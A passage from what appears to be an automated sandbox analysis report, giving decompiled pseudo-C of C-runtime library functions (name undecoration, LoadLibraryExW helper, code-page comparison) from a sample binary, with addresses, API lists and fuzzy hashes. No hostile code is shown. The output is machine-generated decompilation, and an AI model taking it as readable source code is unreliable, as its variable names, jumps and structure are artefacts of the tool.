					_t123 = _t113;
					if(_t123 < 0 || _t123 == 0) {
						_t115 = 0;
						L16:
						_v12 = _t115;
						_v8 = _t115;
						E0135BE9C( &_v12, 0x5b);
						_t54 = E0135BBB1( &_v12,  &_v44, 1);
						_t88 =  &_v36;
						L17:
						E01360109(_a4, E0135BB6D(_t54, _t88, 0x5d));
						_t57 = _a4;
					} else {
						_t83 = _a8;
						_v12 = 0;
						_v8 = 0;
						if(( *(_t83 + 4) & 0x00000800) == 0) {
							L5:
							_t62 = _t113;
							_t113 = _t113 - 1;
							if(_t62 != 0) {
								_t73 =  *0x13a0b18; // 0x0
								if( *_t73 != 0) {
									_t77 = E0135BE4F(_t85,  &_v36, 0x5b, E0135D2B9(_t108,  &_v20, 0));
									_t119 = _t119 + 0x14;
									_t78 = E0135BB6D(_t77,  &_v44, 0x5d);
									_t85 =  &_v12;
									E0135BD24( &_v12, _t78);
									goto L8;
								}
							}
						} else {
							_v20 = "[]";
							_t85 =  &_v12;
							_v16 = 2;
							E0135BC28( &_v12,  &_v20);
							L8:
							if(_v8 <= 1) {
								goto L5;
							}
						}
						if( *_t83 != 0) {
							if(( *(_t83 + 4) & 0x00000800) == 0) {
								_t68 = E0135BB6D(E0135BE4F(_t85,  &_v44, 0x28, _t83),  &_v36, 0x29);
								_push( &_v12);
								_push( &_v20);
								_t104 = _t68;
							} else {
								_t104 = _t83;
								_push( &_v12);
								_push( &_v44);
							}
							_t69 = E0135BB4B(_t104);
							_v12 =  *_t69;
							_v8 =  *((intOrPtr*)(_t69 + 4));
						}
						E0135F545(_t83,  &_v28,  &_v12);
						_t57 = _a4;
						 *_t57 = _v28;
						 *(_t57 + 4) = _v24 | 0x00000800;
					}
				}
				return _t57;
				goto L21;
			}





























                                                                                              0x01360a84
                                                                                              0x01360a89
                                                                                              0x01360a91
                                                                                              0x01360bd7
                                                                                              0x01360bda
                                                                                              0x01360bde
                                                                                              0x00000000
                                                                                              0x01360be0
                                                                                              0x01360be4
                                                                                              0x01360bee
                                                                                              0x01360c14
                                                                                              0x01360c19
                                                                                              0x00000000
                                                                                              0x01360c19
                                                                                              0x00000000
                                                                                              0x01360a97
                                                                                              0x01360a9c
                                                                                              0x01360a9e
                                                                                              0x01360aa0
                                                                                              0x01360b98
                                                                                              0x01360b9a
                                                                                              0x01360b9f
                                                                                              0x01360ba2
                                                                                              0x01360ba5
                                                                                              0x01360bb3
                                                                                              0x01360bb8
                                                                                              0x01360bbb
                                                                                              0x01360bc9
                                                                                              0x01360bce
                                                                                              0x01360aac
                                                                                              0x01360aad
                                                                                              0x01360ab2
                                                                                              0x01360ab5
                                                                                              0x01360abf
                                                                                              0x01360add
                                                                                              0x01360add
                                                                                              0x01360adf
                                                                                              0x01360ae2
                                                                                              0x01360ae4
                                                                                              0x01360aec
                                                                                              0x01360aff
                                                                                              0x01360b04
                                                                                              0x01360b0f
                                                                                              0x01360b15
                                                                                              0x01360b18
                                                                                              0x00000000
                                                                                              0x01360b18
                                                                                              0x01360aec
                                                                                              0x01360ac1
                                                                                              0x01360ac4
                                                                                              0x01360acc
                                                                                              0x01360acf
                                                                                              0x01360ad6
                                                                                              0x01360b1d
                                                                                              0x01360b21
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01360b21
                                                                                              0x01360b25
                                                                                              0x01360b2e
                                                                                              0x01360b53
                                                                                              0x01360b5b
                                                                                              0x01360b5f
                                                                                              0x01360b60
                                                                                              0x01360b30
                                                                                              0x01360b33
                                                                                              0x01360b35
                                                                                              0x01360b39
                                                                                              0x01360b39
                                                                                              0x01360b62
                                                                                              0x01360b69
                                                                                              0x01360b6f
                                                                                              0x01360b6f
                                                                                              0x01360b7a
                                                                                              0x01360b7f
                                                                                              0x01360b90
                                                                                              0x01360b92
                                                                                              0x01360b95
                                                                                              0x01360aa0
                                                                                              0x01360bd6
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DName::operator+.LIBCMT ref: 01360B0F
                                                                                              • DName::operator+.LIBCMT ref: 01360B62
                                                                                                • Part of subcall function 0135BC28: shared_ptr.LIBCMT ref: 0135BC44
                                                                                                • Part of subcall function 0135BE4F: DName::operator+.LIBCMT ref: 0135BE70
                                                                                              • DName::operator+.LIBCMT ref: 01360B53
                                                                                              • DName::operator+.LIBCMT ref: 01360BB3
                                                                                              • DName::operator+.LIBCMT ref: 01360BC0
                                                                                              • DName::operator+.LIBCMT ref: 01360C07
                                                                                              • DName::operator+.LIBCMT ref: 01360C14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Name::operator+$shared_ptr
                                                                                              • String ID:
                                                                                              • API String ID: 1037112749-0
                                                                                              • Opcode ID: eaedccda878d4b4da1521be863163cca54548b0ba09a22fc0e771000b7d68109
                                                                                              • Instruction ID: e0064ce23e483539302545d65f6a5cd6c3b5e85c27eb6245aa5d10e6d9fdab3c
                                                                                              • Opcode Fuzzy Hash: eaedccda878d4b4da1521be863163cca54548b0ba09a22fc0e771000b7d68109
                                                                                              • Instruction Fuzzy Hash: 49516071900219AFDF58DF98D895EEEFBBDEB18B08F048059F605A7184DB70D644CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01362FE2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01362FE2(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0x13a0b68 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0x1394958 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0x13a0b68 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0x13a0b68 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E01368845(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E01368845(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                                                                                              0x01362feb
                                                                                              0x01363080
                                                                                              0x01362ff3
                                                                                              0x01362ff5
                                                                                              0x01362fff
                                                                                              0x01363004
                                                                                              0x01363011
                                                                                              0x01363026
                                                                                              0x0136302a
                                                                                              0x01363090
                                                                                              0x01363095
                                                                                              0x0136309c
                                                                                              0x013630a0
                                                                                              0x013630a3
                                                                                              0x013630a3
                                                                                              0x013630a9
                                                                                              0x013630a9
                                                                                              0x0136308b
                                                                                              0x0136308f
                                                                                              0x0136308f
                                                                                              0x0136302c
                                                                                              0x01363035
                                                                                              0x0136306e
                                                                                              0x0136307b
                                                                                              0x0136307d
                                                                                              0x0136307d
                                                                                              0x00000000
                                                                                              0x0136307d
                                                                                              0x0136303f
                                                                                              0x01363044
                                                                                              0x01363049
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01363053
                                                                                              0x01363058
                                                                                              0x0136305d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01363062
                                                                                              0x01363068
                                                                                              0x0136306c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136306c
                                                                                              0x01363009
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136300f
                                                                                              0x01363089
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,01363113,01357A4C,0000000C,?,00000000,00000000,?,013627DF,00000021,FlsSetValue,01394A90,01394A98,?), ref: 013630A3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-$ext-ms-
                                                                                              • API String ID: 3664257935-537541572
                                                                                              • Opcode ID: ba5e1fb4a19b1fe3b6bce17560ffa57e8e5a244ed250fd12c7da9d127ea7ba0d
                                                                                              • Instruction ID: a74692d196f31b481cb3b7b33135de210320f5b1f3b795bea0db71fe541c28e0
                                                                                              • Opcode Fuzzy Hash: ba5e1fb4a19b1fe3b6bce17560ffa57e8e5a244ed250fd12c7da9d127ea7ba0d
                                                                                              • Instruction Fuzzy Hash: 82213A32A01315ABDB328A7DEC80A5E3B5CFF01768F254214E90AA728CD771E904C7D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0138AAC7 Relevance: 9.2, APIs: 6, Instructions: 248COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0138AAC7(signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, int _a20, intOrPtr* _a24, intOrPtr* _a28, int _a32) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				intOrPtr* _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				int _t54;
				signed int _t59;
				signed int _t60;
				void* _t63;
				signed int _t64;
				signed int _t65;
				int _t71;
				char* _t76;
				char* _t77;
				int _t81;
				int _t82;
				intOrPtr _t94;
				intOrPtr _t95;
				signed int _t103;
				void* _t104;
				int _t106;
				void* _t107;
				intOrPtr* _t108;

				_t49 =  *0x139e210; // 0x1911783b
				_v8 = _t49 ^ _t103;
				_t83 = _a24;
				_v40 = _a4;
				_t102 = _a20;
				_v44 = _a8;
				_t53 = _a16;
				_v32 = _a16;
				_v36 = _a24;
				if(_t102 <= 0) {
					if(_t102 < 0xffffffff) {
						goto L54;
					} else {
						goto L3;
					}
				} else {
					_t81 = E01389DC4(_t53, _t102);
					_t83 = _v36;
					_t102 = _t81;
					L3:
					_t101 = _a28;
					if(_t101 <= 0) {
						if(_t101 < 0xffffffff) {
							goto L54;
						} else {
							goto L6;
						}
					} else {
						_t101 = E01389DC4(_t83, _t101);
						_a28 = _t101;
						L6:
						_t82 = _a32;
						if(_t82 == 0) {
							_t82 =  *( *_v40 + 8);
							_a32 = _t82;
						}
						if(_t102 == 0 || _t101 == 0) {
							if(_t102 == _t101) {
								L61:
								_push(2);
								goto L23;
							} else {
								if(_t101 > 1) {
									L32:
									_t54 = 1;
								} else {
									if(_t102 > 1) {
										L22:
										_push(3);
										goto L23;
									} else {
										if(GetCPInfo(_t82,  &_v28) == 0) {
											goto L54;
										} else {
											if(_t102 <= 0) {
												if(_t101 <= 0) {
													goto L33;
												} else {
													if(_v28 >= 2) {
														_t76 =  &_v22;
														if(_v22 != 0) {
															_t101 = _v36;
															while(1) {
																_t94 =  *((intOrPtr*)(_t76 + 1));
																if(_t94 == 0) {
																	goto L32;
																}
																_t100 =  *_t101;
																if(_t100 <  *_t76 || _t100 > _t94) {
																	_t76 = _t76 + 2;
																	if( *_t76 != 0) {
																		continue;
																	} else {
																		goto L32;
																	}
																} else {
																	goto L61;
																}
																goto L55;
															}
														}
													}
													goto L32;
												}
											} else {
												if(_v28 >= 2) {
													_t77 =  &_v22;
													if(_v22 != 0) {
														_t102 = _v32;
														while(1) {
															_t95 =  *((intOrPtr*)(_t77 + 1));
															if(_t95 == 0) {
																goto L22;
															}
															_t100 =  *_t102;
															if(_t100 <  *_t77 || _t100 > _t95) {
																_t77 = _t77 + 2;
																if( *_t77 != 0) {
																	continue;
																} else {
																	goto L22;
																}
															} else {
																goto L61;
															}
															goto L23;
														}
													}
												}
												goto L22;
												L23:
												_pop(_t54);
											}
										}
									}
								}
							}
						} else {
							L33:
							_t59 = E01368A28(_t82, 9, _v32, _t102, 0, 0);
							_t106 = _t104 + 0x18;
							_v40 = _t59;
							if(_t59 == 0) {
								L54:
								_t54 = 0;
							} else {
								_t100 = _t59 + _t59 + 8;
								asm("sbb eax, eax");
								_t60 = _t59 & _t59 + _t59 + 0x00000008;
								if(_t60 == 0) {
									L60:
									_push(0);
									goto L59;
								} else {
									if(_t60 > 0x400) {
										_t82 = E01367865(_t60);
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xdddd;
											goto L40;
										}
									} else {
										E01386540(_t60);
										_t82 = _t106;
										if(_t82 == 0) {
											goto L60;
										} else {
											 *_t82 = 0xcccc;
											L40:
											_t82 = _t82 + 8;
											if(_t82 == 0) {
												goto L60;
											} else {
												_t102 = _a32;
												_t63 = E01368A28(_a32, 1, _v32, _a32, _t82, _v40);
												_t107 = _t106 + 0x18;
												if(_t63 == 0) {
													L58:
													_push(_t82);
													L59:
													E013688F6();
													goto L53;
												} else {
													_t101 = _v36;
													_t64 = E01368A28(_t102, 9, _v36, _v36, 0, 0);
													_t108 = _t107 + 0x18;
													_v32 = _t64;
													if(_t64 == 0) {
														goto L58;
													} else {
														_t100 = _t64 + _t64 + 8;
														asm("sbb eax, eax");
														_t65 = _t64 & _t64 + _t64 + 0x00000008;
														if(_t65 == 0) {
															L57:
															_push(0);
															goto L52;
														} else {
															if(_t65 > 0x400) {
																_t101 = E01367865(_t65);
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xdddd;
																	goto L49;
																}
															} else {
																E01386540(_t65);
																_t101 = _t108;
																if(_t101 == 0) {
																	goto L57;
																} else {
																	 *_t101 = 0xcccc;
																	L49:
																	_t101 = _t101 + 8;
																	if(_t101 == 0) {
																		goto L57;
																	} else {
																		if(E01368A28(_t102, 1, _v36, _a28, _t101, _v32) != 0) {
																			_t71 = E01362655(_v44, _a12, _t82, _v40, _t101, _v32, 0, 0, 0);
																			_t102 = _t71;
																			E013688F6(_t101);
																			E013688F6(_t82);
																			_t54 = _t71;
																		} else {
																			_push(_t101);
																			L52:
																			E013688F6();
																			E013688F6(_t82);
																			L53:
																			goto L54;
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L55:
				return E01353E0D(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
			}

































                                                                                              0x0138aacf
                                                                                              0x0138aad6
                                                                                              0x0138aadc
                                                                                              0x0138aae0
                                                                                              0x0138aae7
                                                                                              0x0138aaea
                                                                                              0x0138aaed
                                                                                              0x0138aaf0
                                                                                              0x0138aaf3
                                                                                              0x0138aaf9
                                                                                              0x0138ab0e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138aafb
                                                                                              0x0138aafd
                                                                                              0x0138ab04
                                                                                              0x0138ab07
                                                                                              0x0138ab14
                                                                                              0x0138ab14
                                                                                              0x0138ab19
                                                                                              0x0138ab2e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138ab1b
                                                                                              0x0138ab23
                                                                                              0x0138ab26
                                                                                              0x0138ab34
                                                                                              0x0138ab34
                                                                                              0x0138ab39
                                                                                              0x0138ab40
                                                                                              0x0138ab43
                                                                                              0x0138ab43
                                                                                              0x0138ab48
                                                                                              0x0138ab54
                                                                                              0x0138ad5f
                                                                                              0x0138ad5f
                                                                                              0x00000000
                                                                                              0x0138ab5a
                                                                                              0x0138ab5d
                                                                                              0x0138abe9
                                                                                              0x0138abeb
                                                                                              0x0138ab63
                                                                                              0x0138ab66
                                                                                              0x0138abae
                                                                                              0x0138abae
                                                                                              0x00000000
                                                                                              0x0138ab68
                                                                                              0x0138ab75
                                                                                              0x00000000
                                                                                              0x0138ab7b
                                                                                              0x0138ab7d
                                                                                              0x0138abb8
                                                                                              0x00000000
                                                                                              0x0138abba
                                                                                              0x0138abbe
                                                                                              0x0138abc4
                                                                                              0x0138abc7
                                                                                              0x0138abc9
                                                                                              0x0138abcc
                                                                                              0x0138abcc
                                                                                              0x0138abd1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138abd3
                                                                                              0x0138abd7
                                                                                              0x0138abe1
                                                                                              0x0138abe7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138abd7
                                                                                              0x0138abcc
                                                                                              0x0138abc7
                                                                                              0x00000000
                                                                                              0x0138abbe
                                                                                              0x0138ab7f
                                                                                              0x0138ab83
                                                                                              0x0138ab89
                                                                                              0x0138ab8c
                                                                                              0x0138ab8e
                                                                                              0x0138ab91
                                                                                              0x0138ab91
                                                                                              0x0138ab96
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138ab98
                                                                                              0x0138ab9c
                                                                                              0x0138aba6
                                                                                              0x0138abac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138ab9c
                                                                                              0x0138ab91
                                                                                              0x0138ab8c
                                                                                              0x00000000
                                                                                              0x0138abb0
                                                                                              0x0138abb0
                                                                                              0x0138abb0
                                                                                              0x0138ab7d
                                                                                              0x0138ab75
                                                                                              0x0138ab66
                                                                                              0x0138ab5d
                                                                                              0x0138abf1
                                                                                              0x0138abf1
                                                                                              0x0138abfc
                                                                                              0x0138ac01
                                                                                              0x0138ac04
                                                                                              0x0138ac09
                                                                                              0x0138ad0f
                                                                                              0x0138ad0f
                                                                                              0x0138ac0f
                                                                                              0x0138ac12
                                                                                              0x0138ac17
                                                                                              0x0138ac19
                                                                                              0x0138ac1b
                                                                                              0x0138ad5b
                                                                                              0x0138ad5b
                                                                                              0x00000000
                                                                                              0x0138ac21
                                                                                              0x0138ac26
                                                                                              0x0138ac45
                                                                                              0x0138ac4a
                                                                                              0x00000000
                                                                                              0x0138ac50
                                                                                              0x0138ac50
                                                                                              0x00000000
                                                                                              0x0138ac50
                                                                                              0x0138ac28
                                                                                              0x0138ac28
                                                                                              0x0138ac2d
                                                                                              0x0138ac31
                                                                                              0x00000000
                                                                                              0x0138ac37
                                                                                              0x0138ac37
                                                                                              0x0138ac56
                                                                                              0x0138ac56
                                                                                              0x0138ac5b
                                                                                              0x00000000
                                                                                              0x0138ac61
                                                                                              0x0138ac69
                                                                                              0x0138ac6f
                                                                                              0x0138ac74
                                                                                              0x0138ac79
                                                                                              0x0138ad53
                                                                                              0x0138ad53
                                                                                              0x0138ad54
                                                                                              0x0138ad54
                                                                                              0x00000000
                                                                                              0x0138ac7f
                                                                                              0x0138ac84
                                                                                              0x0138ac8b
                                                                                              0x0138ac90
                                                                                              0x0138ac93
                                                                                              0x0138ac98
                                                                                              0x00000000
                                                                                              0x0138ac9e
                                                                                              0x0138aca1
                                                                                              0x0138aca6
                                                                                              0x0138aca8
                                                                                              0x0138acaa
                                                                                              0x0138ad4f
                                                                                              0x0138ad4f
                                                                                              0x00000000
                                                                                              0x0138acb0
                                                                                              0x0138acb5
                                                                                              0x0138acd4
                                                                                              0x0138acd9
                                                                                              0x00000000
                                                                                              0x0138acdb
                                                                                              0x0138acdb
                                                                                              0x00000000
                                                                                              0x0138acdb
                                                                                              0x0138acb7
                                                                                              0x0138acb7
                                                                                              0x0138acbc
                                                                                              0x0138acc0
                                                                                              0x00000000
                                                                                              0x0138acc6
                                                                                              0x0138acc6
                                                                                              0x0138ace1
                                                                                              0x0138ace1
                                                                                              0x0138ace6
                                                                                              0x00000000
                                                                                              0x0138ace8
                                                                                              0x0138acff
                                                                                              0x0138ad36
                                                                                              0x0138ad3c
                                                                                              0x0138ad3e
                                                                                              0x0138ad44
                                                                                              0x0138ad4b
                                                                                              0x0138ad01
                                                                                              0x0138ad01
                                                                                              0x0138ad02
                                                                                              0x0138ad02
                                                                                              0x0138ad08
                                                                                              0x0138ad0e
                                                                                              0x00000000
                                                                                              0x0138ad0e
                                                                                              0x0138acff
                                                                                              0x0138ace6
                                                                                              0x0138acc0
                                                                                              0x0138acb5
                                                                                              0x0138acaa
                                                                                              0x0138ac98
                                                                                              0x0138ac79
                                                                                              0x0138ac5b
                                                                                              0x0138ac31
                                                                                              0x0138ac26
                                                                                              0x0138ac1b
                                                                                              0x0138ac09
                                                                                              0x0138ab48
                                                                                              0x0138ab19
                                                                                              0x0138ad11
                                                                                              0x0138ad22

                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,0138AAB2,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0138AB6D
                                                                                              • __freea.LIBCMT ref: 0138AD02
                                                                                              • __freea.LIBCMT ref: 0138AD08
                                                                                              • __freea.LIBCMT ref: 0138AD3E
                                                                                              • __freea.LIBCMT ref: 0138AD44
                                                                                              • __freea.LIBCMT ref: 0138AD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$Info
                                                                                              • String ID:
                                                                                              • API String ID: 541289543-0
                                                                                              • Opcode ID: e69b260c4bfa786ea9de92e6439a1d0966bb243396732c60611eff6532488dd4
                                                                                              • Instruction ID: b6ed1375237bd8aa78cc1243123931764ed45810d7cf9c303b2a84c44db33310
                                                                                              • Opcode Fuzzy Hash: e69b260c4bfa786ea9de92e6439a1d0966bb243396732c60611eff6532488dd4
                                                                                              • Instruction Fuzzy Hash: 9F71DB7290030AABEF21BF5CCC51FAE7BBA9F4961CF184557EA04E7241E675D904C750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01361579 Relevance: 9.1, APIs: 6, Instructions: 119COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E01361579(intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				char* _t29;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					_t29 =  *0x13a0b18; // 0x0
					if( *_t29 == 0) {
						E0135BB4B(E0135B826( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E013600DB( &_v12);
						_t65 = E0135BB4B(E0135BB6D( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x13a0b18; // 0x0
							if( *_t39 == 0x40) {
								L19:
								 *0x13a0b18 = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E0135BC28(_t75,  &_v12);
									_t39 =  *0x13a0b18; // 0x0
									while(1) {
										_t67 =  *((intOrPtr*)(_t75 + 4));
										if(_t67 > 1) {
											break;
										}
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E0135BCE4(_t75, 1);
											}
											E0135BBD3(_t75, 0x7d);
											_t39 =  *0x13a0b18; // 0x0
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = E0135BE4F(_t67,  &_v20, 0x60, E0135CD2F(_t73,  &_v28));
												_t78 = _t78 + 0x10;
												E0135BD24(_t75, E0135BB6D(_t48,  &_v36, 0x27));
												_t39 =  *0x13a0b18; // 0x0
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x13a0b18 = _t39;
												}
												if( *((intOrPtr*)(_t75 + 4)) > 1 ||  *_t39 == 0x40) {
													continue;
												} else {
													_v12 = "s ";
													_v8 = 2;
													goto L5;
												}
												goto L21;
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}




















                                                                                              0x0136157c
                                                                                              0x0136157f
                                                                                              0x01361586
                                                                                              0x0136158c
                                                                                              0x0136158e
                                                                                              0x01361591
                                                                                              0x01361596
                                                                                              0x0136159c
                                                                                              0x013615a4
                                                                                              0x013616b7
                                                                                              0x013616bf
                                                                                              0x013616c4
                                                                                              0x013615aa
                                                                                              0x013615ae
                                                                                              0x013615ce
                                                                                              0x013615d2
                                                                                              0x013615d4
                                                                                              0x013615d7
                                                                                              0x013615dc
                                                                                              0x013615e2
                                                                                              0x013615ea
                                                                                              0x0136169f
                                                                                              0x013616a0
                                                                                              0x013615f0
                                                                                              0x013615f0
                                                                                              0x013615f7
                                                                                              0x013615fe
                                                                                              0x013615fe
                                                                                              0x01361604
                                                                                              0x01361609
                                                                                              0x0136160e
                                                                                              0x0136160e
                                                                                              0x01361613
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01361619
                                                                                              0x0136161d
                                                                                              0x0136167f
                                                                                              0x01361682
                                                                                              0x01361687
                                                                                              0x01361687
                                                                                              0x01361690
                                                                                              0x01361695
                                                                                              0x0136161f
                                                                                              0x01361622
                                                                                              0x0136167d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01361624
                                                                                              0x01361634
                                                                                              0x01361639
                                                                                              0x0136164c
                                                                                              0x01361651
                                                                                              0x01361659
                                                                                              0x0136165b
                                                                                              0x0136165c
                                                                                              0x0136165c
                                                                                              0x01361664
                                                                                              0x00000000
                                                                                              0x0136166b
                                                                                              0x0136166b
                                                                                              0x01361672
                                                                                              0x00000000
                                                                                              0x01361672
                                                                                              0x00000000
                                                                                              0x01361664
                                                                                              0x01361622
                                                                                              0x00000000
                                                                                              0x0136161d
                                                                                              0x0136169d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136169d
                                                                                              0x013615fe
                                                                                              0x013615ea
                                                                                              0x013615dc
                                                                                              0x013615a4
                                                                                              0x013616c7
                                                                                              0x013616cc

                                                                                              APIs
                                                                                              • DName::operator+.LIBCMT ref: 013615BD
                                                                                              • DName::operator+.LIBCMT ref: 013615C9
                                                                                                • Part of subcall function 0135BC28: shared_ptr.LIBCMT ref: 0135BC44
                                                                                              • DName::operator+=.LIBCMT ref: 01361687
                                                                                                • Part of subcall function 0135CD2F: DName::operator+.LIBCMT ref: 0135CD9A
                                                                                                • Part of subcall function 0135CD2F: DName::operator+.LIBCMT ref: 0135D064
                                                                                                • Part of subcall function 0135BE4F: DName::operator+.LIBCMT ref: 0135BE70
